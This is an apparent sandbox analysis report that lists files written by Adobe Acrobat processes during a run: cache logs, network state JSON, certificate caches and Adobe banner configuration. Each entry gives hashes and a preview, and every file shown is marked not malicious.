SHA-256:	7E14E51FB5D2A4338846C5B58C7AFA9B485D3439C862E63018153ED8EE250B98
SHA-512:	4F2FEE3FF13D1CFE4D4D3FD466681595624F5C568A77D6A79ECB9A621768EA7F4F3A676E7AD94C26836988BD1BAEFF1F5B5A7C3A9C031BEF8551ABAA906A9D02
Malicious:	false
Reputation:	low
Preview:	2024/12/21-07:17:17.037 e68 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/21-07:17:17.038 e68 Recovering log #3.2024/12/21-07:17:17.039 e68 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\3d1e02ca-7d74-4528-a57d-311e10c72d5b.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	508
Entropy (8bit):	5.044972188025652
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqgRSXhsBdOg2Hqcaq3QYiubxnP7E4TfF+:Y2sRdsr1dMHF3QYhbxP7np+
MD5:	0BE2719A39194CC7F8CD680CC13D75CE
SHA1:	9D44A1228538173DF0961DA7F4A4C351715CC189
SHA-256:	C26C2666D05E030B4A472FA8E7FFB991E74B7D47974DE9964626AE7E56839AC0
SHA-512:	8C0F7A8C112FA6F83D1AB0EE332296A0F363F6704FDE977C156B0AA6FE82D710DB95349C7C65F620CEEB8CD0854F4CF17783547FA1396085BA7870602F0EF3A9
Malicious:	false
Reputation:	low
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379343443985944","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":460336},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF3f0879.TMP (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\cc0a8cc8-8a22-4222-80fc-8f4c3b556c85.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4099
Entropy (8bit):	5.2374197512415686
Encrypted:	false
SSDEEP:	96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLU8sCdMe:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLZ
MD5:	80E5024CB278B83978FDCD3649D0E6EE
SHA1:	1C7734EF8732975DA64ED1DF68738D5B1CBB881D
SHA-256:	68284E878E0A0E8415E87AF2D3C18672006E713932F85F0EE3272645E51E4815
SHA-512:	07F7787EB589A74622E722DD7A30BE084B9FB947DAF733C7EBCBF87A63CE2EE0A609CA9AD6EAB26FA7BA993318D929EC5A86727F91438D7654F6473032B465B6
Malicious:	false
Preview:	*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.\|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	323
Entropy (8bit):	5.210360622585316
Encrypted:	false
SSDEEP:	6:BIS1P+q2P92nKuAl9OmbzNMxIFUt8wISzmZZmw+wISmtVkwO92nKuAl9OmbzNMFd:BIyWv4HAa8jFUt8wItZ/+wIN5LHAa84J
MD5:	2AA1CD59914C9B63ACBDC91AD04EDBD9
SHA1:	3ACCB7EE0FA217F710E80E26E58F6049FFB632B9
SHA-256:	D1E16DC6730CA6BE753CEEDEEEB5FD4A8F322D818F8386406E2420C89EE9DE17
SHA-512:	427FC01AF9FEE1453A96576ACA9C640492A17C88C394587B34AA44DCDCCAABC0C24AC05EC1E60799D18A646C2ED59099B0B6D25A82560C22DFB66C061A48F8E3
Malicious:	false
Preview:	2024/12/21-07:17:17.339 e68 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/21-07:17:17.350 e68 Recovering log #3.2024/12/21-07:17:17.387 e68 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	323
Entropy (8bit):	5.210360622585316
Encrypted:	false
SSDEEP:	6:BIS1P+q2P92nKuAl9OmbzNMxIFUt8wISzmZZmw+wISmtVkwO92nKuAl9OmbzNMFd:BIyWv4HAa8jFUt8wItZ/+wIN5LHAa84J
MD5:	2AA1CD59914C9B63ACBDC91AD04EDBD9
SHA1:	3ACCB7EE0FA217F710E80E26E58F6049FFB632B9
SHA-256:	D1E16DC6730CA6BE753CEEDEEEB5FD4A8F322D818F8386406E2420C89EE9DE17
SHA-512:	427FC01AF9FEE1453A96576ACA9C640492A17C88C394587B34AA44DCDCCAABC0C24AC05EC1E60799D18A646C2ED59099B0B6D25A82560C22DFB66C061A48F8E3
Malicious:	false
Preview:	2024/12/21-07:17:17.339 e68 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/21-07:17:17.350 e68 Recovering log #3.2024/12/21-07:17:17.387 e68 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.779094196322516
Encrypted:	false
SSDEEP:	3:kkFkl2Yoml1fllXlE/HT8k8ZNNX8RolJuRdxLlGB9lQRYwpDdt:kKvYoml2T8xNMa8RdWBwRd
MD5:	B082DD75C381758302A8D9FDCB2AE846
SHA1:	AC65BF020C2A8EB9332689A583BC2C4CECF9E1FE
SHA-256:	21C2E7D886399D6A4E239083D4AF6C14FAE5E0F1DB27CCCE4D5EFE6B4E66CEC8
SHA-512:	8E45D392F61AA4E9333FFFEBCCFADD418760DE016C22031155C544924FFBB3EEFBFE5C7A3A851ABC0C55A1420D1BF134554769E41F086C30ECEBCE588E76BC89
Malicious:	false
Preview:	p...... ...........M.S..(....................................................... ..........W....a#..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1402905242023693
Encrypted:	false
SSDEEP:	6:kKqD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:iaDnLNkPlE99SNxAhUe/3
MD5:	624DC94A9BE7D2B795A155A093B1E688
SHA1:	99209FCF39D8A7E56191AEB6F6E86FD20D1F7B0B
SHA-256:	357A8B393542CDCBD1D83E037AFDD86DE7CC2029302F07FD11469FBBBAA6F0E6
SHA-512:	CAEF4483F0BC077041807A2AFCB885303E98882B32EF763F3155177C2F6F242CC47215228C31CCD3075828F42BD9471ED66FEE1833D10BC9EA6C23829A0F7999
Malicious:	false
Preview:	p...... ........V..`.S..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.334969082037231
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJM3g98kUwPeUkwRe9:YvXKX4mtjYpW78FGMbLUkee9
MD5:	1DD38C7A726C2DDE9259F37EAD9F47C8
SHA1:	E337C27BC8725C373FFDF0E6B44A3DF19A4A9A05
SHA-256:	318B5256607EC4291E39DAFCBDE904155ED08504937BA6C2D75A5EEBCFA67151
SHA-512:	8538F27F39132C2E146D400257D8C47784AF0B1D3730DBFE9957F91499B710AF4D9F022894CAC166B0B22966D22BF7FCB20D733CCAC92865654E2E2A9594746C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.272540812643513
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJfBoTfXpnrPeUkwRe9:YvXKX4mtjYpW78FGWTfXcUkee9
MD5:	EF3AA964B7287EF1BA92F39D3F0883DD
SHA1:	34C5305B96D27D1685FF53AFB7065A59359E32C5
SHA-256:	9256B9A589F0C2821038BCFC1E42F77FDF3CFA6916DEA9F282E9F68A2D6BBEAE
SHA-512:	84E764456A74E3DF2B73840EC751EA62D6F89B2CBAE29C506FDB9C1A6FEAEA22B79613062E21D7656F9381D4522D1974F0098D4D6999C5A0ED2DCDDB03C3358F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.2512470268703915
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJfBD2G6UpnrPeUkwRe9:YvXKX4mtjYpW78FGR22cUkee9
MD5:	5C518290C8095E21363222E4BE3439F8
SHA1:	CB0C5A01162CC2F0876694D52A0AFDF67E7B7BF5
SHA-256:	FD1C38C19E42C7280FC3761A74A5ABD54E3E32CEDED0EF69D172E27EB2C20C40
SHA-512:	4CAA143AF1B4E1AE76E1D55E8E478A649C6053CC43420C2697283D8100A4D8B4F2033C00663257D96E1F7E95A3537AE03F2B4F7BBDBC0F1BB775503E9BFFBA3E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.312865668312923
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJfPmwrPeUkwRe9:YvXKX4mtjYpW78FGH56Ukee9
MD5:	34F57072C02ED9FBEC99DE325F81E9B7
SHA1:	93C997540F76EE50B255AC31E24B00EF2684E96C
SHA-256:	417DFDC2D05FD962908BA359D92A76C11F2E2E5C91EF1E71E4BF25103FFDABC5
SHA-512:	3F67E09217D76BB73EEA9058BA4646EFFD4BD1241B90D8CE70E9C80E02985061A7A722530542C060434C1C11212B2735D31D5C61CD8DA8D94A72EC40B3007DD2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.690582943125167
Encrypted:	false
SSDEEP:	24:Yv6X49i8KpLgE9cQx8LennAvzBvkn0RCmK8czOCCSP:Yva3hgy6SAFv5Ah8cv/P
MD5:	91F76867F8F8F0E10452D29999A2DE9E
SHA1:	4BC8D1861C544089CE46FAA0303BDF2719A0963F
SHA-256:	75BB65E3D910441894E41AC0EEA5AC89E199EC7250CC968D3F8261A2F46EFF6D
SHA-512:	437FD58D402EE477A3262442435BF8C94DBDCA8E648EAF5597492B04ED636587B6FD2D1055891B76D18BFE7A89D42D95200170C7EA2528379955DE8FE8B45986
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.259406844936233
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJf8dPeUkwRe9:YvXKX4mtjYpW78FGU8Ukee9
MD5:	8EB8529C6F8CC5D2B940DCB99AC30889
SHA1:	B6A3DA65C65A0F062A031D0565E8B0C9154EA6D7
SHA-256:	F9F9CAA2E67CA004FB4D06E4C9F6F4B42CDF75EE42F588CA987564A43F7F51F2
SHA-512:	EF55837FF889128E278EA98277D0668A16115B0D4CFDD6A48C58EC5CA8D030AE3B30A1509BD61546E936F2B0F5EDAC944F404242006681193AE9514A49CD32A2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.260779099331064
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJfQ1rPeUkwRe9:YvXKX4mtjYpW78FGY16Ukee9
MD5:	A20E113418C243EB3A96649E551A3D1F
SHA1:	BDC1198C005D31E1A5A85926DB243BACDF00A2D2
SHA-256:	A8A62020B818DE767D2C1BE558FD56B6BF36C5A0F55E8B8EDF7CC7E41B49BD65
SHA-512:	7140824CB5793D5EA8F7930B487CC45ADE385942EC88548274B2FBF1CE5465F7A6DFE54FD539C7D4C7645EDFF421CE1AD8CB6CED843A850428C274AB875942BD
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.279423866337794
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJfFldPeUkwRe9:YvXKX4mtjYpW78FGz8Ukee9
MD5:	A99EFB3AFA1D02F792175BC3B5ECA967
SHA1:	E905E5ED19D8525CB53CD7DC9B506ECB5DA70BBD
SHA-256:	1EA89026930CC815DF130A81B33EC28B7F4F16F810EA480C62366B9E68508893
SHA-512:	B0B1A83CFC54C0CC2B82D8308DCE94B6F8303873C17B252BCA2849D1B03C75EFAC18415F5DCB1130F7BBF1DBDB09237751DADB8A5339B7FA6C8340421F80F854
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.287484719526209
Encrypted:	false
